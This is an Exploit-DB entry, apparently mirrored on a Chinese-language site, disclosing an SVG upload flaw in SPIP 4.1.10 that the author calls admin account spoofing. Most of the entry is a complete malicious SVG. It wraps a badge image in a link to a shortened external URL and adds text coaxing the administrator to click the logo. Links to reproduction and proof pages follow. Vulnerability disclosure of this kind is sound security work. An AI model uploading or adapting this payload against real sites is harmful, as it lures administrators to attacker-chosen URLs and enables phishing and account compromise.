spip v4.1.10 – Spoofing Admin account

• Exploit Database
• 31 阅读

• 作者： nu11secur1ty
  日期： 2023-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51557/

• ## Exploit Title: spip v4.1.10 - Spoofing Admin account 
  ## Author: nu11secur1ty
  ## Date: 06.29.2023
  ## Vendor: https://www.spip.net/en_rubrique25.html
  ## Software: https://files.spip.net/spip/archives/spip-v4.1.10.zip
  ## Reference: https://www.crowdstrike.com/cybersecurity-101/spoofing-attacks/
  
  ## Description:
  The malicious user can upload a malicious SVG file which file is not
  filtered by a security function, and he can trick
  the administrator of this system to check his logo by clicking on him
  and visiting, maybe a very dangerous URL.
  Wrong web app website logic, and not well sanitizing upload function.
  
  STATUS: HIGH- Vulnerability
  
  [+]Exploit:
  ```SVG
   <svg xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <defs>
   <linearGradient id="badgeGradient">
   <stop offset="0"/>
   <stop offset="1"/>
   </linearGradient>
   </defs>
  
   <g id="heading">
   <a xlink:href= "https://rb.gy/74f0y">
   <path id="badge" d="M 29.6,22.8 C 29.2,23.4 24.3,22.4
  23.8,22.9 C 23.4,23.3 24.3,28.3 23.8,28.6 C 23.2,28.9 19.4,25.6
  18.8,25.8 C 18.2,26.0 16.5,30.7 15.8,30.7 C 15.2,30.7 13.5,26.0
  12.9,25.8 C 12.3,25.6 8.5,28.9 7.9,28.6 C 7.4,28.3 8.3,23.3 7.9,22.9 C
  7.4,22.4 2.4,23.4 2.1,22.8 C 1.8,22.3 5.1,18.4 4.9,17.8 C 4.8,17.2
  0.0,15.5 0.0,14.9 C 0.0,14.3 4.8,12.6 4.9,12.0 C 5.1,11.4 1.8,7.5
  2.1,7.0 C 2.4,6.4 7.4,7.3 7.9,6.9 C 8.3,6.5 7.4,1.5 7.9,1.2 C 8.5,0.9
  12.3,4.1 12.9,4.0 C 13.5,3.8 15.2,-0.8 15.8,-0.8 C 16.5,-0.8 18.2,3.8
  18.8,4.0 C 19.4,4.1 23.2,0.9 23.8,1.2 C 24.3,1.5 23.4,6.5 23.8,6.9 C
  24.3,7.3 29.2,6.4 29.6,7.0 C 29.9,7.5 26.6,11.4 26.8,12.0 C 26.9,12.6
  31.7,14.3 31.7,14.9 C 31.7,15.5 26.9,17.2 26.8,17.8 C 26.6,18.4
  29.9,22.3 29.6,22.8 z"/>
   <!--<text id="label" x="5" y="20" transform = "rotate(-15 10
  10)">New</text>-->
   <text id="title" x="40" y="20">Please click on the logo, to
  see our design services, on our website, thank you!</text>
   </a>
   </g>
  
   </svg>
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/SPIP-4.1.10)
  
  ## Proof and Exploit:
  [href](https://www.nu11secur1ty.com/2023/06/spip-v4110-spoofing-admin-account.html)
  
  ## Time spend:
  00:37:00